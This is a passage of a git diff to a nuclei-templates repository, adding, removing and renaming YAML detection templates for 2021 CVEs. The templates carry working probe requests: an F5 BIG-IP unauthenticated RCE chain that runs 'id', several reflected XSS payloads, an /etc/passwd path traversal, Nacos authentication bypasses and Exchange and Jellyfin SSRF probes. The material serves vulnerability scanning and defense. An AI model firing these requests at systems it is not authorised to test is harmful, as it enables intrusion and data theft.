impact: | - An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure. - remediation: | - Apply the necessary patches or updates provided by VMWare to fix the vulnerability. - reference: - - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/ - - https://www.vmware.com/security/advisories/VMSA-2021-0029.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-22054 - - https://github.com/fardeen-ahmed/Bug-bounty-Writeups - - https://github.com/nomi-sec/PoC-in-GitHub - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-22054 - cwe-id: CWE-918 - epss-score: 0.74813 - epss-percentile: 0.98065 - cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: vmware - product: workspace_one_uem_console - fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" - tags: cve2021,cve,vmware,workspace,ssrf - -http: - - method: GET - path: - - "{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A" - - matchers-condition: and - matchers: - - type: word - words: - - "Interactsh Server" - - - type: status - status: - - 200 -# digest: 4a0a004730450221008cded273bebf41eff90732aed8ea7da8aa14ca8124eaa2032d424ca27e56d6e7022079f5f692df095ec9105de7a2f9449144593cfd651fe28038d367431e92871cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-22873.yaml b/nuclei-templates/CVE-2021/cve-2021-22873.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-22873.yaml rename to nuclei-templates/CVE-2021/cve-2021-22873.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-22986.yaml b/nuclei-templates/CVE-2021/cve-2021-22986.yaml deleted file mode 100644 index 984c82bbf6..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-22986.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: CVE-2021-22986 -info: - name: F5 BIG-IP iControl REST unauthenticated RCE - author: rootxharsh,iamnoooob - severity: critical - tags: bigip,cve,cve2021,rce,mirai - description: The iControl REST interface has an unauthenticated remote command execution vulnerability. - reference: - - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986 - - https://support.f5.com/csp/article/K03009991 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-22986 - -requests: - - raw: - - | - POST /mgmt/shared/authn/login HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Authorization: Basic YWRtaW46 - Content-Type: application/json - Cookie: BIGIPAuthCookie=1234 - Connection: close - - {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}} - - | - POST /mgmt/tm/util/bash HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - X-F5-Auth-Token: §token§ - Content-Type: application/json - Connection: close - - {"command":"run","utilCmdArgs":"-c id"} - - extractors: - - type: regex - part: body - internal: true - name: token - group: 1 - regex: - - "([A-Z0-9]{26})" - - type: regex - part: body - group: 1 - regex: - - "\"commandResult\":\"(.*)\"" - - matchers: - - type: word - words: - - "commandResult" - - "uid=" - condition: and diff --git a/nuclei-templates/wordpress/cve-2021-24291.yaml b/nuclei-templates/CVE-2021/cve-2021-24291.yaml similarity index 99% rename from nuclei-templates/wordpress/cve-2021-24291.yaml rename to nuclei-templates/CVE-2021/cve-2021-24291.yaml index 199bda1013..d5501bff21 100644 --- a/nuclei-templates/wordpress/cve-2021-24291.yaml +++ b/nuclei-templates/CVE-2021/cve-2021-24291.yaml @@ -1,4 +1,5 @@ id: CVE-2021-24291 + info: name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS) author: geeknik @@ -11,19 +12,23 @@ info: cvss-score: 6.10 cve-id: CVE-2021-24291 cwe-id: CWE-79 + requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//' + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: header words: - "text/html" + - type: word words: - "onmouseover=alert(document.domain)//" diff --git a/nuclei-templates/CVE-2021/CVE-2021-26119.yaml b/nuclei-templates/CVE-2021/cve-2021-26119.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-26119.yaml rename to nuclei-templates/CVE-2021/cve-2021-26119.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-26475.yaml b/nuclei-templates/CVE-2021/cve-2021-26475.yaml new file mode 100644 index 0000000000..197a0e35f5 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-26475.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-26475 + +info: + name: EPrints 3.4.2 XSS + author: geeknik + description: EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI. + reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf + severity: medium + tags: cve,cve2021,xss,eprints + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26475 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2021/cve-2021-26598.yaml b/nuclei-templates/CVE-2021/cve-2021-26598.yaml new file mode 100644 index 0000000000..2822629060 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-26598.yaml @@ -0,0 +1,57 @@ +id: CVE-2021-26598 + +info: + name: ImpressCMS - Incorrect Authorization + author: gy741,pdteam + severity: medium + description: ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token). + reference: + - https://hackerone.com/reports/1081137 + - http://karmainsecurity.com/KIS-2022-03 + - https://github.com/ImpressCMS + - https://nvd.nist.gov/vuln/detail/CVE-2021-26598 + metadata: + shodan-query: http.html:"ImpressCMS" + tags: cve,cve2021,impresscms,unauth,cms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-26598 + cwe-id: CWE-287 + +requests: + - raw: + - | + GET /misc.php?action=showpopups&type=friend HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 + + - | + GET /include/findusers.php?token={{token}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 + + cookie-reuse: true + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - 'last_login' + - 'user_regdate' + - 'uname' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: token + internal: true + group: 1 + regex: + - "REQUEST' value='(.*?)'" + - 'REQUEST" value="(.*?)"' diff --git a/nuclei-templates/CVE-2021/cve-2021-26702.yaml b/nuclei-templates/CVE-2021/cve-2021-26702.yaml deleted file mode 100644 index 8e73cc509d..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-26702.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2021-26702 - -info: - name: EPrints 3.4.2 - Cross-Site Scripting - author: ritikchaddha - severity: medium - description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability. - reference: - - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf - - https://files.eprints.org/2548/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-26702 - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/grymer/CVE - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-26702 - cwe-id: CWE-79 - epss-score: 0.00187 - epss-percentile: 0.55045 - cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: eprints - product: eprints - tags: cve2021,cve,xss,eprints - -http: - - method: GET - path: - - "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 -# digest: 4b0a004830460221009b48ac40178577233170a5f266ee2c7b513aa37f7b23a52a482a075b66751079022100cb0c07b43883f3e7f17d94e7c61f0729594cc79ccec51c2470e9060313d1e9ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-26722.yaml b/nuclei-templates/CVE-2021/cve-2021-26722.yaml deleted file mode 100644 index 72c53cc241..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-26722.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2021-26722 - -info: - name: LinkedIn Oncall 1.4.0 XSS - author: pikpikcu - severity: medium - description: LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the "No results found for" message in the search bar. - reference: https://github.com/linkedin/oncall/issues/341 - tags: cve,cve2021,linkedin,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-26722 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-26812.yaml b/nuclei-templates/CVE-2021/cve-2021-26812.yaml deleted file mode 100644 index 5fbda4f90e..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-26812.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2021-26812 - -info: - name: Moodle jitsi plugin XSS - author: aceseven (digisec360) - description: Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject javascript code to be run by the application. - severity: medium - tags: cve,cve2021,moodle,jitsi,xss,plugin - reference: - - https://github.com/udima-university/moodle-mod_jitsi/issues/67 - - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-26812 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "alert(document.domain);" - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "MoodleSession" diff --git a/nuclei-templates/CVE-2021/cve-2021-26855.yaml b/nuclei-templates/CVE-2021/cve-2021-26855.yaml deleted file mode 100644 index 657ae33b97..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-26855.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2021-26855 - -info: - name: Exchange Server SSRF Vulnerability - author: madrobot - severity: critical - description: | - Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. - tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft - reference: - - https://proxylogon.com/#timeline - - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 - - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-26855 - -requests: - - raw: - - | - GET /owa/auth/x.js HTTP/1.1 - Host: {{Hostname}} - Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3; - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-27309.yaml b/nuclei-templates/CVE-2021/cve-2021-27309.yaml new file mode 100644 index 0000000000..f8a8753b88 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-27309.yaml @@ -0,0 +1,53 @@ +id: CVE-2021-27309 + +info: + name: Clansphere CMS 2011.4 - Cross-Site Scripting + author: edoardottt + severity: medium + description: | + Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "module" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of Clansphere CMS or apply the vendor-supplied patch to fix the XSS vulnerability. + reference: + - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309 + - https://nvd.nist.gov/vuln/detail/CVE-2021-27309 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-27309 + cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42925 + cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: csphere + product: clansphere + tags: cve2021,cve,clansphere,xss,cms,unauth,csphere + +http: + - method: GET + path: + - "{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22>" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">.php' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a0047304502205b00fbd835bf6365747ca455e3baf330c2bf123afee61ae0f8981aa1dab11857022100ef6c2c713eaa742043860a3f65409516d36de9988dd7053879e71c4db8f4a572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-27519.yaml b/nuclei-templates/CVE-2021/cve-2021-27519.yaml deleted file mode 100644 index 459b0599d6..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-27519.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2021-27519 - -info: - name: FUDForum 3.1.0 - Cross-Site Scripting - author: kh4sh3i - severity: medium - description: | - FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter. - impact: | - Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. - remediation: | - Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability. - reference: - - https://www.exploit-db.com/exploits/49942 - - https://github.com/fudforum/FUDforum/issues/2 - - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 - - https://github.com/ARPSyndicate/cvemon - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-27519 - cwe-id: CWE-79 - epss-score: 0.00217 - epss-percentile: 0.59015 - cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: fudforum - product: fudforum - shodan-query: 'http.html:"Powered by: FUDforum"' - tags: cve2021,cve,xss,fudforum,edb,packetstorm - -http: - - method: GET - path: - - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'highlightSearchTerms("x" onmouseover=alert(1) x="");' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 -# digest: 4a0a00473045022100f69ec7d4711d599dd40f92495d22b5d93ac3a8db167fe425f7b024ff41d888c5022030ad77de1858a49de1ff57b58e699741fa419442f186dd2a419fa4f433ee8138:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27561.yaml b/nuclei-templates/CVE-2021/cve-2021-27561.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-27561.yaml rename to nuclei-templates/CVE-2021/cve-2021-27561.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-27748.yaml b/nuclei-templates/CVE-2021/cve-2021-27748.yaml deleted file mode 100644 index 471a3628f9..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-27748.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2021-27748 - -info: - name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery - author: pdteam - severity: high - description: | - IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers. - impact: | - Successful exploitation of this vulnerability could allow an attacker to bypass security controls, access internal resources, and potentially perform further attacks. - remediation: | - Apply the latest security patches or updates provided by IBM to mitigate this vulnerability. - reference: - - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ - - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748 - classification: - cve-id: CVE-2021-27748 - metadata: - verified: true - max-request: 3 - shodan-query: http.html:"IBM WebSphere Portal" - tags: cve2021,cve,hcl,ibm,ssrf,websphere - -http: - - method: GET - path: - - '{{BaseURL}}' - - '{{BaseURL}}/docpicker/internal_proxy/http/oast.me' - - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me' - - host-redirects: true - max-redirects: 2 - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Interactsh Server" - - - type: word - part: body_1 - words: - - "Interactsh Server" - negative: true -# digest: 490a0046304402200ba3597e1cd51ea49029981ba317f0f962cc8082d2f3796e4d59fc9138bf9d9d0220226c8cb7207a0c85488b5ce96a38f6e0b616ebb9b487135b1fda864f9d6503d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-27850.yaml b/nuclei-templates/CVE-2021/cve-2021-27850.yaml deleted file mode 100644 index 44b1b651c3..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-27850.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2021-27850 - -info: - name: Apache Tapestry - Arbitrary class download - description: | - A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. - author: pdteam - severity: critical - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-27850 - tags: cve,cve2021,apache,tapestry - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-27850 - cwe-id: CWE-502 - -requests: - - raw: - - | - GET /assets/app/something/services/AppModule.class/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - extractors: - - type: regex - regex: - - '\/assets\/app\/([a-z0-9]+)\/services\/AppMod' - internal: true - name: id - part: header - group: 1 - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'application/java' - part: header - - - type: word - words: - - 'configuration' - - 'webtools' - part: body - condition: and diff --git a/nuclei-templates/CVE-2021/cve-2021-28377.yaml b/nuclei-templates/CVE-2021/cve-2021-28377.yaml deleted file mode 100644 index 832e5871fd..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-28377.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2021-28377 -info: - name: ChronoForums 2.0.11 - Directory Traversal - author: 0x_Akoko - severity: high - description: The ChronoForums avatar function is vulnerable through unauthenticated path traversal attacks. This enables unauthenticated attackers to read arbitrary files, like for instance Joomla's configuration file containing secret credentials. - reference: - - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L - cvss-score: 7.5 - cve-id: CVE-2021-28377 - cwe-id: CWE-200 - tags: cve,cve2021,chronoforums,lfi,joomla - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-28854.yaml b/nuclei-templates/CVE-2021/cve-2021-28854.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-28854.yaml rename to nuclei-templates/CVE-2021/cve-2021-28854.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-28937.yaml b/nuclei-templates/CVE-2021/cve-2021-28937.yaml deleted file mode 100644 index 7c00cd061c..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-28937.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2021-28937 - -info: - name: Acexy Wireless-N WiFi Repeater Password Disclosure - author: geeknik - description: The password.html page of the Web management interface of the Acexy Wireless-N WiFi Repeater REV 1.0 contains the administrator account password in plaintext. - reference: https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990 - severity: high - tags: cve,cve2021,acexy,disclosure,iot - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-28937 - cwe-id: CWE-312 - -requests: - - method: GET - path: - - "{{BaseURL}}/password.html" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Password Setting" - - "addCfg('username'" - - "addCfg('newpass'" - condition: and diff --git a/nuclei-templates/CVE-2021/cve-2021-29156.yaml b/nuclei-templates/CVE-2021/cve-2021-29156.yaml deleted file mode 100644 index fa05456c95..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-29156.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-29156 - -info: - name: LDAP Injection In OpenAM - author: melbadry9,xelkomy - severity: high - tags: cve,cve2021,openam,ldap,injection - description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval. - remediation: Upgrade to OpenAM commercial version 13.5.1 or later. - reference: - https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md - https://hackerone.com/reports/1278050 - https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/ - https://portswigger.net/research/hidden-oauth-attack-vectors - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-29156 - cwe-id: CWE-74 - -requests: - - method: GET - path: - - "{{BaseURL}}/openam/ui/PWResetUserValidation" - - "{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation" - - "{{BaseURL}}/ui/PWResetUserValidation" - - matchers: - - type: dsl - dsl: - - 'contains(body, "jato.pageSession") && status_code==200' - -# Enhanced by cs on 2022/01/24 diff --git a/nuclei-templates/CVE-2021/cve-2021-29441.yaml b/nuclei-templates/CVE-2021/cve-2021-29441.yaml new file mode 100644 index 0000000000..87203f1c21 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-29441.yaml @@ -0,0 +1,54 @@ +id: CVE-2021-29441 + +info: + name: Nacos prior to 1.4.1 Authentication Bypass + description: | + This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5. + + In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true) + Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that + enables Nacos servers to bypass this filter and therefore skip authentication checks. + This mechanism relies on the user-agent HTTP header so it can be easily spoofed. + This issue may allow any user to carry out any administrative tasks on the Nacos server. + author: dwisiswant0 + severity: critical + reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ + tags: nacos,auth-bypass,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-29441 + cwe-id: CWE-290 + +requests: + - raw: + - | + POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1 + Host: {{Hostname}} + Accept: */* + User-Agent: Nacos-Server + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 403" + - "status_code_2 == 200" + condition: and + + - type: dsl + dsl: + - "contains(body_1, 'Forbidden')" + - "body_2 == 'true'" + condition: and + + - type: word + words: + - "application/json" + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-29442.yaml b/nuclei-templates/CVE-2021/cve-2021-29442.yaml deleted file mode 100644 index 7b61103f73..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-29442.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2021-29442 - -info: - name: Nacos prior to 1.4.1 Missing Authentication Check - description: | - In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. - While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. - These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql) - author: dwisiswant0 - severity: high - reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ - tags: nacos,auth-bypass,cve,cve2021 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-29442 - cwe-id: CWE-306 - -requests: - - method: GET - path: - - "{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "application/json" - part: header - - type: regex - regex: - - "\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\"" - part: body diff --git a/nuclei-templates/CVE-2021/cve-2021-29490.yaml b/nuclei-templates/CVE-2021/cve-2021-29490.yaml new file mode 100644 index 0000000000..e648de593f --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-29490.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-29490 + +info: + name: Jellyfin <10.7.2 SSRF + author: alph4byt3 + severity: medium + description: Jellyfin is a free software media system that provides media from a dedicated server to end-user devices via multiple apps. Verions prior to 10.7.3 vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-29490 + - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96 + tags: cve,cve2021,ssrf,jellyfin + classification: + cvss-metrics: 